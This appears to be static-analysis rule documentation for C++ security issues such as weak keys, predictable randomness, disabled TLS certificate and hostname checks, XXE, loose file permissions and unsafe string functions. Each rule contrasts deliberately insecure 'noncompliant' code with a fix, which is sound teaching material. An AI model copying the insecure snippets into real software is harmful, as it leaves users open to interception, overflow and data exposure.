    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Botan

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 1024); // Noncompliant
}

Here is an example with the generation of a key as part of a Discrete Logarithmic (DL) group, a Digital Signature Algorithm (DSA) parameter:

#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/1024"); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp160k1"); // Noncompliant
}

Compliant solution

#include <botan/pubkey.h>
#include <botan/rng.h>
#include <botan/rsa.h>

void encrypt() {
    std::unique_ptr<Botan::RandomNumberGenerator>   rng(new Botan::System_RNG);
    Botan::RSA_PrivateKey                           rsaKey(*rng, 2048);
}
#include <botan/dl_group.h>

void encrypt() {
    Botan::DL_Group("dsa/botan/2048");
}
#include <botan/ec_group.h>

void encrypt() {
    Botan::EC_Group("secp224k1");
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

cpp:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a strong random number generator such as randombytes_uniform() or randombytes_buf() from libsodium, or randomize() from Botan.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

#include <random>
// ...

void f() {
  int random_int = std::rand(); // Sensitive
}

Compliant Solution

#include <sodium.h>
#include <botan/system_rng.h>
// ...

void f() {
  char random_chars[10];
  randombytes_buf(random_chars, 10); // Compliant
  uint32_t random_int = randombytes_uniform(10); // Compliant

  uint8_t random_chars[10];
  Botan::System_RNG system;
  system.randomize(random_chars, 10); // Compliant
}

See

cpp:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Botan

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Documentation

Standards

cpp:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("MD5")); // Sensitive
    return hash->process(input);
}

Compliant Solution

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("SHA-512")); // Compliant
    return hash->process(input);
}

See

cpp:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Xerces

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse() {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(false); // Noncompliant
  DOMparser->setDisableDefaultEntityResolution(false); // Noncompliant

  DOMparser->parse(xmlFile);
}

By default, entities resolution is enabled for XMLReaderFactory::createXMLReader.

#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse() {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, false); // Noncompliant

  reader->parse(xmlFile);
}

By default, entities resolution is enabled for SAXParser.

#include "xercesc/parsers/SAXParser.hpp"

void parse() {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(false); // Noncompliant

  SAXparser->parse(xmlFile);
}

Compliant solution

By default, XercesDOMParser is safe.

#include "xercesc/parsers/XercesDOMParser.hpp"

void parse() {
  XercesDOMParser *DOMparser = new XercesDOMParser();
  DOMparser->setCreateEntityReferenceNodes(true);
  DOMparser->setDisableDefaultEntityResolution(true);

  DOMparser->parse(xmlFile);
}
#include "xercesc/sax2/SAX2XMLReader.hpp"

void parse() {
  SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
  reader->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);

  reader->parse(xmlFile);
}
#include "xercesc/parsers/SAXParser.hpp"

void parse() {
  SAXParser* SAXparser = new SAXParser();
  SAXparser->setDisableDefaultEntityResolution(true);

  SAXparser->parse(xmlFile);
}

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

cpp:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

When creating a file or directory with permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process set 777 permissions to this newly created file

mkdir("myfolder", S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process try to set 777 permissions to this newly created directory

When explicitly adding permissions to "other group" with chmod, fchmod or filesystem::permissions functions:

chmod("myfile.txt", S_IRWXU | S_IRWXG | S_IRWXO);  // Sensitive: the process set 777 permissions to this file

fchmod(fd, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process set 777 permissions to this file descriptor

When defining the umask without read, write and execute permissions for "other group":

umask(S_IRWXU | S_IRWXG); // Sensitive: the further files and folders will be created with possible permissions to "other group"

Compliant Solution

When creating a file or directory, do not set permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG); // Compliant

mkdir("myfolder", S_IRWXU | S_IRWXG); // Compliant

When using chmod, fchmod or filesystem::permissions functions, do not add permissions to "other group":

chmod("myfile.txt", S_IRWXU | S_IRWXG);  // Compliant

fchmod(fd, S_IRWXU | S_IRWXG); // Compliant

When defining the umask, set read, write and execute permissions to other group:

umask(S_IRWXO); // Compliant: further created files or directories will not have permissions set for "other group"

See

cpp:S5814

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcat( char *restrict dest, const char *restrict src ); appends the characters of string src at the end of dest. The wcscat does the same for wide characters and should be used with the same guidelines.

Note: the functions strncat and wcsncat might look like attractive safe replacements for strcat and wcscaty, but they have their own set of issues (see S5815), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointer-to by src
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcat_s and the wcscat_s that were designed as safer alternatives to strcat and wcscat. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strcat(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char *dest = malloc(sizeof(result) + strlen(src)); // Not need of +1 for final 0 because sizeof will already count one 0
  strcpy(dest, result);
  strcat(dest, src); // Compliant: the buffer size was carefully crafted
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}

See

cpp:S5813

The function size_t strlen(const char *s) measures the length of the string s (excluding the final null character).
The function size_t wcslen(const wchar_t *s) does the same for wide characters, and should be used with the same guidelines.

Similarly to many other functions in the standard C libraries, strlen and wcslen assume that their argument is not a null pointer.

Additionally, they expect the strings to be null-terminated. For example, the 5-letter string "abcde" must be stored in memory as "abcde\0" (i.e. using 6 characters) to be processed correctly. When a string is missing the null character at the end, these functions will iterate past the end of the buffer, which is undefined behavior.

Therefore, string parameters must end with a proper null character. The absence of this particular character can lead to security vulnerabilities that allow, for example, access to sensitive data or the execution of arbitrary code.

Ask Yourself Whether

  • There is a possibility that the pointer is null.
  • There is a possibility that the string is not correctly null-terminated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use safer functions. The C11 functions strlen_s and wcslen_s from annex K handle typical programming errors.
    Note, however, that they have a runtime overhead and require more code for error handling and therefore are not suited to every case.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions.
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone.

Sensitive Code Example

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  return strlen(dest); // Sensitive: "dest" will not be null-terminated if truncation happened
}

Compliant Solution

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  dest[sizeof dest - 1] = 0;
  return strlen(dest); // Compliant: "dest" is guaranteed to be null-terminated
}

See

  • MITRE, CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
  • CERT, STR07-C. - Use the bounds-checking interfaces for string manipulation
cpp:S5816

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncpy(char * restrict dest, const char * restrict src, size_t count); copies the first count characters from src to dest, stopping at the first null character, and filling extra space with 0. The wcsncpy does the same for wide characters and should be used with the same guidelines.

Both of those functions are designed to work with fixed-length strings and might result in a non-null-terminated string.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • The security of your system can be compromised if the destination is a truncated version of the source
  • The source buffer can be both non-null-terminated and smaller than the count
  • The destination buffer can be smaller than the count
  • You expect dest to be a null-terminated string
  • There is an overlap between the source and the destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncpy_s and the wcsncpy_s that were designed as safer alternatives to strcpy and wcscpy. It’s not recommended to use them in all circumstances, because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncpy and wsncpy as a safer version of strcpy and wcscpy, you should instead consider strcpy_s and wcscpy_s, because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • Too much work is done to fill the buffer with 0, leading to suboptimal performance
    • Unless manually corrected, the dest string might not be null-terminated
  • If you want to use strcpy and wcscpy functions and detect if the string was truncated, the pattern is the following:
    • Set the last character of the buffer to null
    • Call the function
    • Check if the last character of the buffer is still null
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof(dest)); // Sensitive: might silently truncate
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char dest[256];
  dest[sizeof dest - 1] = 0;
  strncpy(dest, src, sizeof(dest)); // Compliant
  if (dest[sizeof dest - 1] != 0) {
    // Handle error
  }
  return doSomethingWith(dest);
}

See

cpp:S5815

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncat( char *restrict dest, const char *restrict src, size_t count ); appends the characters of string src at the end of dest, but only add count characters max. dest will always be null-terminated. The wcsncat does the same for wide characters, and should be used with the same guidelines.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointer-to by src
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncat_s and the wcsncat_s that were designed as safer alternatives to strncat and wcsncat. It’s not recommended to use them in all circumstances because they introduce a runtime overhead and require to write more code for error handling, but they perform checks that will limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncat and wsncat as a safer version of strcat and wcscat, you should instead consider strcat_s and wcscat_s because these functions have several shortcomings:
    • It’s not easy to detect truncation
    • The count parameter is error-prone
    • Computing the count parameter typically requires computing the string length of dest, at which point other simpler alternatives exist

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strncat(dest, src, sizeof dest); // Sensitive: passing the buffer size instead of the remaining size
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char dest[256];
  strcpy(dest, result);
  strncat(dest, src, sizeof dest - sizeof result); // Compliant but may silently truncate
  return doSomethingWith(dest);
}

See

cpp:S5824

The functions "tmpnam", "tmpnam_s" and "tmpnam_r" are all used to return a file name that does not match an existing file, in order for the application to create a temporary file. However, even if the file did not exist at the time those functions were called, it might exist by the time the application tries to use the file name to create the files. This has been used by hackers to gain access to files that the application believed were trustworthy.

There are alternative functions that, in addition to creating a suitable file name, create and open the file and return the file handler. Such functions are protected from this attack vector and should be preferred. About the only reason to use these functions would be to create a temporary folder, not a temporary file.

Additionally, these functions might not be thread-safe, and if you don’t provide them buffers of sufficient size, you will have a buffer overflow.

Ask Yourself Whether

  • There is a possibility that several threads call any of these functions simultaneously
  • There is a possibility that the resulting file is opened without forcing its creation, meaning that it might have unexpected access rights
  • The buffers passed to these functions are respectively smaller than
    • L_tmpnam for tmpnam
    • L_tmpnam_s for tmpnam_s
    • L_tmpnam for tmpnam_r

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a function that directly opens the temporary file, such a tmpfile, tmpfile_s, mkstemp or mkstemps (the last two allow more accurate control of the file name).
  • If you can’t get rid of these functions, when using the generated name to open the file, use a function that forces the creation of the file and fails if the file already exists.

Sensitive Code Example

int f(char *tempData) {
  char *path = tmpnam(NULL); // Sensitive
  FILE* f = fopen(tmpnam, "w");
  fputs(tempData, f);
  fclose(f);
}

Compliant Solution

int f(char *tempData) {
  // The file will be opened in "wb+" mode, and will be automatically removed on normal program exit
  FILE* f = tmpfile(); // Compliant
  fputs(tempData, f);
  fclose(f);
}

See

cpp:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string host = "10.10.0.1"; // Sensitive
dbi_conn_set_option(conn, "host", host.c_str());
dbi_conn_set_option(conn, "host", "10.10.0.1"); // Sensitive

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string host = getDatabaseHost(); // Compliant
dbi_conn_set_option(conn, "host", host.c_str()); // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

cpp:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Botan

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12); // Noncompliant
}

Compliant solution

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks { };

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
    Callbacks callbacks;
    Botan::AutoSeeded_RNG rng;
    Botan::TLS::Session_Manager_In_Memory session_mgr(rng);
    Client_Credentials creds;
    Botan::TLS::Strict_Policy policy;

    Botan::TLS::Client client(callbacks, session_mgr, creds, policy, rng,
                              Botan::TLS::Server_Information("example.com", 443),
                              Botan::TLS::Protocol_Version::TLS_V12);
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Documentation

Standards

cpp:S5801

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcpy(char * restrict dest, const char * restrict src); copies characters from src to dest. The wcscpy does the same for wide characters and should be used with the same guidelines.

Note: the functions strncpy and wcsncpy might look like attractive safe replacements for strcpy and wcscpy, but they have their own set of issues (see S5816), and you should probably prefer another more adapted alternative.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • There is a possibility that the source string is not correctly null-terminated, or that its length (including the final null character) can be larger than the size of the destination buffer.
  • There is an overlap between source and destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

